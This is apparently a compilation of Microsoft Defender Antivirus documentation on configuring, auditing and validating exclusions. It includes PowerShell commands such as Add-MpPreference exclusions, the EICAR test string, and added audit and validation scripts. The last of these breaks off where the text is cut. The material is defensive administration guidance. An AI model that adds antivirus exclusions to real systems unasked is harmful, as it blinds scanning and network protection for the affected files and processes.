Process exclusions also affect network protection and attack surface reduction rules.
Specifically, a process exclusion on any platform causes network protection and ASR to
be unable to inspect traffic or enforce rules for that specific process.

Keep the following points in mind when you're defining exclusions:

Exclusions are technically a protection gap. Consider all your options when
defining exclusions. See Submissions, suppressions, and exclusions.

Review exclusions periodically. Recheck and re-enforce mitigations as part of your
review process.

Ideally, avoid defining exclusions in an attempt to be proactive. For example, don't
exclude something just because you think it might be a problem in the future. Use
exclusions only for specific issues, such as those pertaining to performance or
application compatibility that exclusions could mitigate.

Review and audit changes to your list of exclusions. Your security team should
preserve context around why a certain exclusion was added to avoid confusion
later on. Your security team should be able to provide specific answers to
questions about why exclusions exist.

Audit antivirus exclusions on Exchange systems


Microsoft Exchange has supported integration with the Antimalware Scan Interface
(AMSI) since the June 2021 Quarterly Updates for Exchange (see Running Windows
antivirus software on Exchange servers). It's highly recommended to install these
updates and make sure that AMSI is working properly. See Microsoft Defender Antivirus
security intelligence and product updates.

Many organizations exclude the Exchange directories from antivirus scans for
performance reasons. Microsoft recommends auditing Microsoft Defender Antivirus
exclusions on Exchange systems and assessing whether exclusions can be removed
without impacting performance in your environment to ensure the highest level of
protection. Exclusions can be managed by using Group Policy, PowerShell, or systems
management tools like Microsoft Intune.

To audit Microsoft Defender Antivirus exclusions on an Exchange Server, run the
Get-MpPreference command from an elevated PowerShell prompt. (See Get-MpPreference.)
If exclusions can't be removed for the Exchange processes and folders, keep in mind
that running a quick scan in Microsoft Defender Antivirus scans the Exchange directories
and files, regardless of exclusions.
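As an added example, not code from the article, of the audit the preceding paragraph describes: the following reads the ExclusionPath, ExclusionExtension and ExclusionProcess lists that Get-MpPreference returns and flags entries that deserve a recorded justification, in line with the review points above (exclusions are a protection gap; process exclusions also blind network protection and ASR for that process). The flagging heuristics, the pattern lists and the function name are this example's own constructions, not Microsoft guidance from this page.

```powershell
# Added example, not code from the Microsoft Learn article.
# Lists the custom exclusions configured on an endpoint (for instance an
# Exchange server) and flags the ones that most need a documented reason.
# The patterns and extension list are the author's own review heuristics.

function Get-DefenderExclusionReport {
    param(
        # Locations that are broad or typically writable by standard users.
        [string[]]$BroadPathPatterns = @(
            '^[A-Za-z]:\\?$',                        # a whole drive, e.g. C:\
            '^[A-Za-z]:\\Users\\',                   # anything under user profiles
            '\\Temp\\', '\\Tmp\\', '\\Downloads\\',  # scratch locations
            '^\*|\\\*$'                              # leading wildcard or trailing \*
        ),
        # Extensions that carry executable content; excluding them applies everywhere.
        [string[]]$ExecutableExtensions = @('exe','dll','ps1','bat','cmd','vbs','js','scr','com','msi')
    )

    $pref = Get-MpPreference

    foreach ($p in @($pref.ExclusionPath | Where-Object { $_ })) {
        $hit  = $BroadPathPatterns | Where-Object { $p -match $_ }
        $flag = [bool]$hit
        $reason = ''
        if ($flag) { $reason = 'broad or user-writable location' }
        [pscustomobject]@{ Kind = 'Path'; Value = $p; Flag = $flag; Reason = $reason }
    }

    foreach ($e in @($pref.ExclusionExtension | Where-Object { $_ })) {
        # Extension exclusions accept ".test" and "test" alike, so normalise first.
        $ext  = $e.TrimStart('.').ToLowerInvariant()
        $flag = $ExecutableExtensions -contains $ext
        $reason = ''
        if ($flag) { $reason = 'executable content excluded on every path' }
        [pscustomobject]@{ Kind = 'Extension'; Value = $e; Flag = $flag; Reason = $reason }
    }

    foreach ($proc in @($pref.ExclusionProcess | Where-Object { $_ })) {
        # A process exclusion skips files opened by that process and also stops
        # network protection and ASR rules from inspecting it, so every entry is
        # flagged for review rather than pattern-matched.
        [pscustomobject]@{ Kind = 'Process'; Value = $proc; Flag = $true
                           Reason = 'process exclusion: confirm still required' }
    }
}

# Example usage:
# Get-DefenderExclusionReport | Sort-Object Flag -Descending | Format-Table -AutoSize
# Get-DefenderExclusionReport | Where-Object Flag |
#     Export-Csv -Path .\exclusion-review.csv -NoTypeInformation
```

Keeping the exported CSV with the ticket or change record that introduced each exclusion gives the security team the context the review guidance above asks for, and re-running the report on a schedule shows when new entries appear.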

See also
Microsoft Defender Antivirus exclusions on Windows Server 2016 and later
Common mistakes to avoid when defining exclusions
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus
Configure and validate exclusions for Microsoft Defender for Endpoint on Linux
Configure and validate exclusions for Microsoft Defender for Endpoint on macOS

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Configure and validate exclusions based on file extension and
folder location
Article • 06/06/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

You can define exclusions for Microsoft Defender Antivirus that apply to scheduled scans, on-demand scans, and always-on, real-time
protection and monitoring. Generally, you don't need to apply exclusions. If you do need to apply exclusions, then you can choose from
the following:

Exclusions based on file extensions and folder locations (described in this article)
Exclusions for files that are opened by processes

Important

Microsoft Defender Antivirus exclusions do apply to some Microsoft Defender for Endpoint capabilities, such as attack surface
reduction rules. Some Microsoft Defender Antivirus exclusions are applicable to some ASR rule exclusions. See Attack surface
reduction rules reference - Microsoft Defender Antivirus exclusions and ASR rules. Files that you exclude using the methods
described in this article can still trigger Endpoint Detection and Response (EDR) alerts and other detections. To exclude files broadly,
add them to the Microsoft Defender for Endpoint custom indicators.

Before you begin

See Recommendations for defining exclusions before defining your exclusion lists.

Exclusion lists
To exclude certain files from Microsoft Defender Antivirus scans, modify your exclusion lists. Microsoft Defender Antivirus includes many
automatic exclusions based on known operating system behaviors and typical management files, such as those used in enterprise
management, database management, and other enterprise scenarios and situations.

Note

Exclusions apply to potentially unwanted apps (PUA) detections as well. Automatic exclusions apply only to Windows Server 2016 and
later. These exclusions are not visible in the Windows Security app and in PowerShell.

The following table lists some examples of exclusions based on file extension and folder location.

| Exclusion | Examples | Exclusion list |
|---|---|---|
| Any file with a specific extension | All files with the specified extension, anywhere on the machine. Valid syntax: .test and test | Extension exclusions |
| Any file under a specific folder | All files under the c:\test\sample folder | File and folder exclusions |
| A specific file in a specific folder | The file c:\sample\sample.test only | File and folder exclusions |
| A specific process | The executable file c:\test\process.exe | File and folder exclusions |

Characteristics of exclusion lists

Folder exclusions apply to all files and folders under that folder, unless the subfolder is a reparse point. Reparse point subfolders must be excluded separately.
File extensions apply to any file name with the defined extension if a path or folder is not defined.

Important notes about exclusions based on file extensions and folder locations
Using wildcards such as the asterisk (*) will alter how the exclusion rules are interpreted. See the Use wildcards in the file name and
folder path or extension exclusion lists section for important information about how wildcards work.

Don't exclude mapped network drives. Specify the actual network path.

Folders that are reparse points and that are created after the Microsoft Defender Antivirus service starts are not recognized as exclusions, even if they have been added to the exclusion list. Restart the service (by restarting Windows) so that new reparse points are recognized as valid exclusion targets.

Exclusions apply to scheduled scans, on-demand scans, and real-time protection, but not across all Defender for Endpoint capabilities.
To define exclusions across Defender for Endpoint, use custom indicators.

By default, local changes made to the lists (by users with administrator privileges, including changes made with PowerShell and WMI)
will be merged with the lists as defined (and deployed) by Group Policy, Configuration Manager, or Intune. The Group Policy lists take
precedence when there are conflicts. In addition, exclusion list changes made with Group Policy are visible in the Windows Security
app.

To allow local changes to override managed deployment settings, configure how locally and globally defined exclusions lists are
merged.

Configure the list of exclusions based on folder name or file extension

You can choose from several methods to define exclusions for Microsoft Defender Antivirus.

Use Intune to configure file name, folder, or file extension exclusions

See the following articles:

Configure device restriction settings in Microsoft Intune
Microsoft Defender Antivirus device restriction settings for Windows 10 in Intune

Use Configuration Manager to configure file name, folder, or file extension exclusions
See How to create and deploy antimalware policies: Exclusion settings for details on configuring Microsoft Configuration Manager (current
branch).

Use Group Policy to configure folder or file extension exclusions

Note

If you specify a fully qualified path to a file, then only that file is excluded. If a folder is defined in the exclusion, then all files and subdirectories under that folder are excluded.

1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group Policy Object you
want to configure, and then select Edit.

2. In the Group Policy Management Editor go to Computer configuration, and select Administrative templates.

3. Expand the tree to Windows components > Microsoft Defender Antivirus > Exclusions.

4. Open the Path Exclusions setting for editing, and add your exclusions.
a. Set the option to Enabled.
b. Under the Options section, select Show.
c. Specify each folder on its own line under the Value name column.
d. If you are specifying a file, ensure that you enter a fully qualified path to the file, including the drive letter, folder path, file name,
and extension.
e. Enter 0 in the Value column.

5. Choose OK.

6. Open the Extension Exclusions setting for editing and add your exclusions.
a. Set the option to Enabled.
b. Under the Options section, select Show.
c. Enter each file extension on its own line under the Value name column.
d. Enter 0 in the Value column.

7. Choose OK.

Use PowerShell cmdlets to configure file name, folder, or file extension exclusions
Using PowerShell to add or remove exclusions for files based on the extension, location, or file name requires using a combination of three cmdlets and the appropriate exclusion list parameter. The cmdlets are all in the Defender module.

The format for the cmdlets is as follows:

PowerShell

<cmdlet> -<exclusion list> "<item>"

The following table lists cmdlets that you can use in the <cmdlet> portion of the PowerShell cmdlet:

| Configuration action | PowerShell cmdlet |
|---|---|
| Create or overwrite the list | Set-MpPreference |
| Add to the list | Add-MpPreference |
| Remove item from the list | Remove-MpPreference |

The following table lists values that you can use in the <exclusion list> portion of the PowerShell cmdlet:

| Exclusion type | PowerShell parameter |
|---|---|
| All files with a specified file extension | -ExclusionExtension |
| All files under a folder (including files in sub-directories), or a specific file | -ExclusionPath |

Important

If you have created a list, either with Set-MpPreference or Add-MpPreference, using the Set-MpPreference cmdlet again will overwrite the existing list.

For example, the following code snippet would cause Microsoft Defender Antivirus scans to exclude any file with the .test file extension:

PowerShell

Add-MpPreference -ExclusionExtension ".test"

 Tip

For more information, see Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and Defender Antivirus
cmdlets.
Use Windows Management Instrumentation (WMI) to configure file name, folder, or file extension exclusions
Use the Set, Add, and Remove methods of the MSFT_MpPreference class for the following properties:

WMI

ExclusionExtension
ExclusionPath

Using Set, Add, and Remove is analogous to their counterparts in PowerShell: Set-MpPreference, Add-MpPreference, and Remove-MpPreference.

 Tip

For more information, see Windows Defender WMIv2 APIs.

Use the Windows Security app to configure file name, folder, or file extension exclusions
See Add exclusions in the Windows Security app for instructions.

Use wildcards in the file name and folder path or extension exclusion lists
You can use the asterisk (*), question mark (?), or environment variables (such as %ALLUSERSPROFILE%) as wildcards when defining items in the
file name or folder path exclusion list. The way these wildcards are interpreted differs from their usual usage in other apps and languages.
Make sure to read this section to understand their specific limitations.

Important

There are key limitations and usage scenarios for these wildcards:

Environment variable usage is limited to machine variables and those applicable to processes running as an NT
AUTHORITY\SYSTEM account.
You can only use a maximum of six wildcards per entry.
You cannot use a wildcard in place of a drive letter.
An asterisk * in a folder exclusion stands in place for a single folder. Use multiple instances of \*\ to indicate multiple nested
folders with unspecified names.

The following list describes how the wildcards can be used and provides some examples.

* (asterisk)
In file name and file extension inclusions, the asterisk replaces any number of characters, and only applies to files in the last folder defined in the argument. In folder exclusions, the asterisk replaces a single folder. Use multiple * with folder slashes \ to indicate multiple nested folders. After matching the number of wildcarded and named folders, all subfolders are also included.
Examples:
C:\MyData\*.txt includes C:\MyData\notes.txt
C:\somepath\*\Data includes any file in C:\somepath\Archives\Data and its subfolders, and C:\somepath\Authorized\Data and its subfolders
C:\Serv\*\*\Backup includes any file in C:\Serv\Primary\Denied\Backup and its subfolders, and C:\Serv\Secondary\Allowed\Backup and its subfolders

? (question mark)
In file name and file extension inclusions, the question mark replaces a single character, and only applies to files in the last folder defined in the argument. In folder exclusions, the question mark replaces a single character in a folder name. After matching the number of wildcarded and named folders, all subfolders are also included.
Examples:
C:\MyData\my?.zip includes C:\MyData\my1.zip
C:\somepath\?\Data includes any file in C:\somepath\P\Data and its subfolders
C:\somepath\test0?\Data would include any file in C:\somepath\test01\Data and its subfolders

Environment variables
The defined variable is populated as a path when the exclusion is evaluated.
Example:
%ALLUSERSPROFILE%\CustomLogFiles would include C:\ProgramData\CustomLogFiles\Folder1\file1.txt

Important

If you mix a file exclusion argument with a folder exclusion argument, the rules will stop at the file argument match in the matched folder, and will not look for file matches in any subfolders. For example, you can exclude all files that start with "date" in the folders c:\data\final\marked and c:\data\review\marked by using the rule argument c:\data\*\marked\date*. This argument, however, will not match any files in subfolders under c:\data\final\marked or c:\data\review\marked.

System environment variables

The following table lists and describes the system account environment variables.


This system environment variable... Redirects to this

%APPDATA% C:\Windows\system32\config\systemprofile\Appdata\Roaming

%APPDATA%\Microsoft\Internet Explorer\Quick Launch C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Laun

%APPDATA%\Microsoft\Windows\Start Menu C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu

%APPDATA%\Microsoft\Windows\Start Menu\Programs C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs

%LOCALAPPDATA% C:\WINDOWS\system32\config\systemprofile\AppData\Local

%ProgramData% C:\ProgramData

%ProgramFiles% C:\Program Files

%ProgramFiles%\Common Files C:\Program Files\Common Files

%ProgramFiles%\Windows Sidebar\Gadgets C:\Program Files\Windows Sidebar\Gadgets

%ProgramFiles(x86)% C:\Program Files (x86)

%ProgramFiles(x86)%\Common Files C:\Program Files (x86)\Common Files

%SystemDrive% C:

%SystemDrive%\Program Files C:\Program Files

%SystemDrive%\Program Files (x86) C:\Program Files (x86)

%SystemDrive%\Users C:\Users

%SystemDrive%\Users\Public C:\Users\Public

%SystemRoot% C:\Windows

%windir% C:\Windows

%windir%\Fonts C:\Windows\Fonts

%windir%\Resources C:\Windows\Resources

%windir%\resources\0409 C:\Windows\resources\0409

%windir%\system32 C:\Windows\System32

%ALLUSERSPROFILE% C:\ProgramData

%ALLUSERSPROFILE%\Application Data C:\ProgramData\Application Data

%ALLUSERSPROFILE%\Documents C:\ProgramData\Documents

%ALLUSERSPROFILE%\Documents\My Music\Sample Music C:\ProgramData\Documents\My Music\Sample Music


%ALLUSERSPROFILE%\Documents\My Music C:\ProgramData\Documents\My Music

%ALLUSERSPROFILE%\Documents\My Pictures C:\ProgramData\Documents\My Pictures

%ALLUSERSPROFILE%\Documents\My Pictures\Sample Pictures C:\ProgramData\Documents\My Pictures\Sample Pictures

%ALLUSERSPROFILE%\Documents\My Videos C:\ProgramData\Documents\My Videos

%ALLUSERSPROFILE%\Microsoft\Windows\DeviceMetadataStore C:\ProgramData\Microsoft\Windows\DeviceMetadataStore

%ALLUSERSPROFILE%\Microsoft\Windows\GameExplorer C:\ProgramData\Microsoft\Windows\GameExplorer

%ALLUSERSPROFILE%\Microsoft\Windows\Ringtones C:\ProgramData\Microsoft\Windows\Ringtones

%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu C:\ProgramData\Microsoft\Windows\Start Menu

%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs C:\ProgramData\Microsoft\Windows\Start Menu\Programs

%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Administrative Tools C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools

%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

%ALLUSERSPROFILE%\Microsoft\Windows\Templates C:\ProgramData\Microsoft\Windows\Templates

%ALLUSERSPROFILE%\Start Menu C:\ProgramData\Start Menu

%ALLUSERSPROFILE%\Start Menu\Programs C:\ProgramData\Start Menu\Programs

%ALLUSERSPROFILE%\Start Menu\Programs\Administrative Tools C:\ProgramData\Start Menu\Programs\Administrative Tools

%ALLUSERSPROFILE%\Templates C:\ProgramData\Templates

%LOCALAPPDATA%\Microsoft\Windows\ConnectedSearch\Templates C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\ConnectedSearch\Templa

%LOCALAPPDATA%\Microsoft\Windows\History C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\History

%PUBLIC% C:\Users\Public

%PUBLIC%\AccountPictures C:\Users\Public\AccountPictures

%PUBLIC%\Desktop C:\Users\Public\Desktop

%PUBLIC%\Documents C:\Users\Public\Documents

%PUBLIC%\Downloads C:\Users\Public\Downloads

%PUBLIC%\Music\Sample Music C:\Users\Public\Music\Sample Music

%PUBLIC%\Music\Sample Playlists C:\Users\Public\Music\Sample Playlists

%PUBLIC%\Pictures\Sample Pictures C:\Users\Public\Pictures\Sample Pictures

%PUBLIC%\RecordedTV.library-ms C:\Users\Public\RecordedTV.library-ms

%PUBLIC%\Videos C:\Users\Public\Videos

%PUBLIC%\Videos\Sample Videos C:\Users\Public\Videos\Sample Videos

%USERPROFILE% C:\Windows\system32\config\systemprofile

%USERPROFILE%\AppData\Local C:\Windows\system32\config\systemprofile\AppData\Local

%USERPROFILE%\AppData\LocalLow C:\Windows\system32\config\systemprofile\AppData\LocalLow

%USERPROFILE%\AppData\Roaming C:\Windows\system32\config\systemprofile\AppData\Roaming

Review the list of exclusions

You can retrieve the items in the exclusion list by using one of the following methods:

Intune
Microsoft Configuration Manager
MpCmdRun
PowerShell
Windows Security app

Important

Exclusion list changes made with Group Policy will show in the lists of Windows Security app. Changes made in the Windows Security
app will not show in the Group Policy lists.

If you use PowerShell, you can retrieve the list in the following two ways:

Retrieve the status of all Microsoft Defender Antivirus preferences. Each list is displayed on separate lines, but the items within each
list are combined into the same line.
Write the status of all preferences to a variable, and use that variable to only call the specific list you are interested in. Each use of
Add-MpPreference is written to a new line.

Validate the exclusion list by using MpCmdRun

To check exclusions with the dedicated command-line tool mpcmdrun.exe, use the following commands from an elevated Command Prompt (Start, CMD, Run as admin):

Console

cd "%programdata%\microsoft\windows defender\platform"
cd 4.18.2111-5.0
MpCmdRun.exe -CheckExclusion -path <path>

Here 4.18.2111-5.0 is this month's Microsoft Defender Antivirus "Platform Update" folder; use the version folder that is present on your device.

Note

Checking exclusions with MpCmdRun requires Microsoft Defender Antivirus CAMP version 4.18.2111-5.0 (released in December 2021)
or later.

Review the list of exclusions alongside all other Microsoft Defender Antivirus preferences by using PowerShell
Use the following cmdlet:

PowerShell

Get-MpPreference

[Screenshot: Get-MpPreference output with the items contained in the ExclusionExtension list highlighted]

For more information, see Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and Defender Antivirus cmdlets.

Retrieve a specific exclusions list by using PowerShell

Use the following code snippet (enter each line as a separate command); replace WDAVprefs with whatever label you want to name the variable:

PowerShell

$WDAVprefs = Get-MpPreference
$WDAVprefs.ExclusionExtension
$WDAVprefs.ExclusionPath

[Screenshot: the list split into new lines for each use of the Add-MpPreference cmdlet]

For more information, see Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and Defender Antivirus cmdlets.

Validate exclusions lists with the EICAR test file

You can validate that your exclusion lists are working by using PowerShell with either the Invoke-WebRequest cmdlet or the .NET WebClient class to download a test file.

In the following PowerShell snippet, replace test.txt with a file that conforms to your exclusion rules. For example, if you have excluded
the .testing extension, replace test.txt with test.testing . If you are testing a path, ensure you run the cmdlet within that path.

PowerShell

Invoke-WebRequest "https://secure.eicar.org/eicar.com.txt" -OutFile "test.txt"

If Microsoft Defender Antivirus reports malware, then the rule is not working. If there is no report of malware and the downloaded file exists, then the exclusion is working. You can open the file to confirm the contents are the same as what is described on the EICAR test file website.

You can also use the following PowerShell code, which calls the .NET WebClient class to download the test file. As with the Invoke-WebRequest cmdlet, replace c:\test.txt with a file that conforms to the rule you are validating:

PowerShell

$client = new-object System.Net.WebClient
$client.DownloadFile("http://www.eicar.org/download/eicar.com.txt","c:\test.txt")

If you do not have Internet access, you can create your own EICAR test file by writing the EICAR string to a new text file with the following
PowerShell command:

PowerShell

[io.file]::WriteAllText("test.txt",'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*')

You can also copy the string into a blank text file and attempt to save it with the file name or in the folder you are attempting to exclude.
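The following added example (not from the Microsoft article) automates the offline EICAR check above: it writes the EICAR string to a path that should be covered by the exclusion under test, waits for real-time protection, and then reports whether the file survived, whether a detection was logged, and what MpCmdRun.exe -CheckExclusion says about the same path. It assumes an elevated PowerShell prompt on a Windows device with Microsoft Defender Antivirus, and the function name and the probe path are this example's own.

```powershell
# Added example, not from the Microsoft article. Run elevated on a Windows device with
# Microsoft Defender Antivirus; the function name and the probe path are this example's own.

function Test-DefenderExclusion {
    [CmdletBinding()]
    param(
        # Full path of the file to create; its folder or extension should match the exclusion under test.
        [Parameter(Mandatory)] [string] $Path,
        # Time given to real-time protection before the result is read.
        [int] $WaitSeconds = 10
    )

    # The EICAR string from the article: harmless, but detected by every major antivirus engine.
    $eicar = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'

    # WriteAllText resolves relative paths against the process directory, not $PWD, so use the full path.
    $full = [System.IO.Path]::GetFullPath($Path)
    $dir  = Split-Path -Parent $full
    if (-not (Test-Path -LiteralPath $dir)) { New-Item -ItemType Directory -Path $dir -Force | Out-Null }

    $written = $true
    try   { [System.IO.File]::WriteAllText($full, $eicar) }
    catch { $written = $false }   # the write itself was blocked at creation time

    Start-Sleep -Seconds $WaitSeconds
    $stillPresent = $written -and (Test-Path -LiteralPath $full)

    # Was a detection logged for this path? Resources lists the affected items, including the file path.
    $detected = @(Get-MpThreatDetection -ErrorAction SilentlyContinue | Where-Object {
        ($_.Resources -join ';').IndexOf($full, [System.StringComparison]::OrdinalIgnoreCase) -ge 0
    }).Count -gt 0

    # Ask the engine's own tool; the newest platform folder under %ProgramData% holds the current MpCmdRun.exe.
    $platformRoot = Join-Path $env:ProgramData 'Microsoft\Windows Defender\Platform'
    $mpCmdRun = Get-ChildItem -Path $platformRoot -Directory -ErrorAction SilentlyContinue |
        Sort-Object LastWriteTime -Descending | Select-Object -First 1 |
        ForEach-Object { Join-Path $_.FullName 'MpCmdRun.exe' }
    $checkOutput = if ($mpCmdRun -and (Test-Path -LiteralPath $mpCmdRun)) {
        (& $mpCmdRun -CheckExclusion -path $full 2>&1 | Out-String).Trim()
    } else { 'MpCmdRun.exe not found; -CheckExclusion skipped' }

    [pscustomobject]@{
        Path             = $full
        FileWritten      = $written
        FileStillPresent = $stillPresent
        DetectionLogged  = $detected
        # Per the article: no detection and the file still exists means the exclusion is working.
        ExclusionWorking = ($stillPresent -and -not $detected)
        CheckExclusion   = $checkOutput
    }
}

# Constructed probe path: exercises an exclusion for the c:\test\sample folder or the .testing extension.
Test-DefenderExclusion -Path 'C:\test\sample\probe.testing' | Format-List
```

Delete the probe file afterwards if it survived; a file that was quarantined can be reviewed with Get-MpThreatDetection.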

 Tip

If you're looking for Antivirus related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

See also
Configure and validate exclusions in Microsoft Defender Antivirus scans
Configure and validate exclusions for files opened by processes
Configure Microsoft Defender Antivirus exclusions on Windows Server
Common mistakes to avoid when defining exclusions


Configure exclusions for files opened by processes
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender Antivirus

Platforms

Windows

You can exclude files that are opened by specific processes from Microsoft Defender
Antivirus scans. Note that these types of exclusions are for files that are opened by
processes and not the processes themselves. To exclude a process, add a file exclusion
(see Configure and validate exclusions based on file extension and folder location).

See Important points about exclusions and review the information in Manage exclusions
for Microsoft Defender for Endpoint and Microsoft Defender Antivirus before defining
your exclusion lists.

This article describes how to configure exclusion lists.

Examples of exclusions

| Exclusion | Example |
|---|---|
| Any file on the machine that is opened by any process with a specific file name | Specifying test.exe would exclude files opened by c:\sample\test.exe and d:\internal\files\test.exe |
| Any file on the machine that is opened by any process under a specific folder | Specifying c:\test\sample\* would exclude files opened by c:\test\sample\test.exe, c:\test\sample\test2.exe, and c:\test\sample\utility.exe |
| Any file on the machine that is opened by a specific process in a specific folder | Specifying c:\test\process.exe would exclude files opened only by c:\test\process.exe |

When you add a process to the process exclusion list, Microsoft Defender Antivirus
won't scan files opened by that process, no matter where the files are located. The
process itself, however, will be scanned unless it has also been added to the file
exclusion list.

The exclusions only apply to always-on real-time protection and monitoring. They don't
apply to scheduled or on-demand scans.

Changes made with Group Policy to the exclusion lists will show in the lists in the
Windows Security app. However, changes made in the Windows Security app will not
show in the Group Policy lists.

You can add, remove, and review the lists for exclusions in Group Policy, Microsoft
Configuration Manager, Microsoft Intune, and with the Windows Security app, and you
can use wildcards to further customize the lists.

You can also use PowerShell cmdlets and WMI to configure the exclusion lists, including
reviewing your lists.

By default, local changes made to the lists (by users with administrator privileges;
changes made with PowerShell and WMI) are merged with the lists as defined (and
deployed) by Group Policy, Configuration Manager, or Intune. The Group Policy lists take
precedence if there are conflicts.

You can configure how locally and globally defined exclusions lists are merged to allow
local changes to override managed deployment settings.

Note

Network Protection and Attack surface reduction rules are directly impacted by
process exclusions on all platforms, meaning that a process exclusion on any OS
(Windows, MacOS, Linux) will result in Network Protection or ASR being unable to
inspect traffic or enforce rules for that specific process.
Configure the list of exclusions for files opened by specified processes

Use Microsoft Intune to exclude files that have been opened by specified processes from scans

For more information, see Configure device restriction settings in Microsoft Intune and Microsoft Defender Antivirus device restriction settings for Windows 10 in Intune.

Use Microsoft Configuration Manager to exclude files that have been opened by specified processes from scans

See How to create and deploy antimalware policies: Exclusion settings for details on configuring Microsoft Configuration Manager (current branch).

Use Group Policy to exclude files that have been opened by specified processes from scans

1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group Policy Object you want to configure and click Edit.

2. In the Group Policy Management Editor, go to Computer configuration and click Administrative templates.

3. Expand the tree to Windows components > Microsoft Defender Antivirus >
Exclusions.

4. Double-click Process Exclusions and add the exclusions:
a. Set the option to Enabled.
b. Under the Options section, click Show....
c. Enter each process on its own line under the Value name column. See the
example table for the different types of process exclusions. Enter 0 in the Value
column for all processes.

5. Click OK.

Use PowerShell cmdlets to exclude files that have been opened by specified processes from scans
Using PowerShell to add or remove exclusions for files that have been opened by
processes requires using a combination of three cmdlets with the -ExclusionProcess
parameter. The cmdlets are all in the Defender module.

The format for the cmdlets is:

PowerShell

<cmdlet> -ExclusionProcess "<item>"

The following are allowed as the <cmdlet>:

| Configuration action | PowerShell cmdlet |
|---|---|
| Create or overwrite the list | Set-MpPreference |
| Add to the list | Add-MpPreference |
| Remove items from the list | Remove-MpPreference |

Important

If you have created a list, either with Set-MpPreference or Add-MpPreference, using the Set-MpPreference cmdlet again will overwrite the existing list.

For example, the following code snippet would cause Microsoft Defender Antivirus
scans to exclude any file that is opened by the specified process:

PowerShell

Add-MpPreference -ExclusionProcess "c:\internal\test.exe"

For more information on how to use PowerShell with Microsoft Defender Antivirus, see
Manage antivirus with PowerShell cmdlets and Microsoft Defender Antivirus cmdlets.

Use Windows Management Instrumentation (WMI) to exclude files that have been opened by specified processes from scans

Use the Set, Add, and Remove methods of the MSFT_MpPreference class for the following properties:

WMI

ExclusionProcess

The use of Set, Add, and Remove is analogous to their counterparts in PowerShell: Set-MpPreference, Add-MpPreference, and Remove-MpPreference.

For more information and allowed parameters, see Windows Defender WMIv2 APIs.

Use the Windows Security app to exclude files that have been opened by specified processes from scans

See Add exclusions in the Windows Security app for instructions.

Use wildcards in the process exclusion list

The use of wildcards in the process exclusion list is different from their use in other exclusion lists.

In particular, you can't use the question mark ( ? ) wildcard, and the asterisk ( * ) wildcard
can only be used at the end of a complete path. You can still use environment variables
(such as %ALLUSERSPROFILE% ) as wildcards when defining items in the process exclusion
list.

The following table describes how the wildcards can be used in the process exclusion list:

| Wildcard | Example use | Example matches |
|---|---|---|
| * (asterisk): replaces any number of characters | C:\MyData\* | Any file opened by C:\MyData\file.exe |
| Environment variables: the defined variable is populated as a path when the exclusion is evaluated | %ALLUSERSPROFILE%\CustomLogFiles\file.exe | Any file opened by C:\ProgramData\CustomLogFiles\file.exe |

Review the list of exclusions

You can retrieve the items in the exclusion list with MpCmdRun, PowerShell, Microsoft Configuration Manager, Intune, or the Windows Security app.

If you use PowerShell, you can retrieve the list in two ways:

Retrieve the status of all Microsoft Defender Antivirus preferences. Each of the lists
are displayed on separate lines, but the items within each list are combined into
the same line.
Write the status of all preferences to a variable, and use that variable to only call
the specific list you're interested in. Each use of Add-MpPreference is written to a
new line.

Validate the exclusion list by using MpCmdRun

To check exclusions with the dedicated command-line tool mpcmdrun.exe, use the following command:

DOS

MpCmdRun.exe -CheckExclusion -path <path>

Note

Checking exclusions with MpCmdRun requires Microsoft Defender Antivirus CAMP version 4.18.1812.3 (released in December 2018) or later.

Review the list of exclusions alongside all other Microsoft Defender Antivirus preferences by using PowerShell
Use the following cmdlet:

PowerShell

Get-MpPreference

For more information on how to use PowerShell with Microsoft Defender Antivirus, see Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and Microsoft Defender Antivirus cmdlets.

Retrieve a specific exclusions list by using PowerShell

Use the following code snippet (enter each line as a separate command); replace WDAVprefs with whatever label you want to name the variable:

PowerShell

$WDAVprefs = Get-MpPreference
$WDAVprefs.ExclusionProcess

For more information on how to use PowerShell with Microsoft Defender Antivirus, see
Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and
Microsoft Defender Antivirus cmdlets.
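The following added example (not from the Microsoft article) serves the PowerShell and "Review the list of exclusions" sections of this article and of the preceding file extension and folder location article: it takes the three lists returned by Get-MpPreference and checks each entry against the limits the two articles state (at most six wildcards, no wildcard for the drive letter, no mapped network drives, SYSTEM-profile environment variables, no ? and only a trailing * in process entries, bare image names). The function name, the executable-extension list and the sample preference object are this example's own.

```powershell
# Added example, not from the Microsoft article: lint the three Defender Antivirus exclusion
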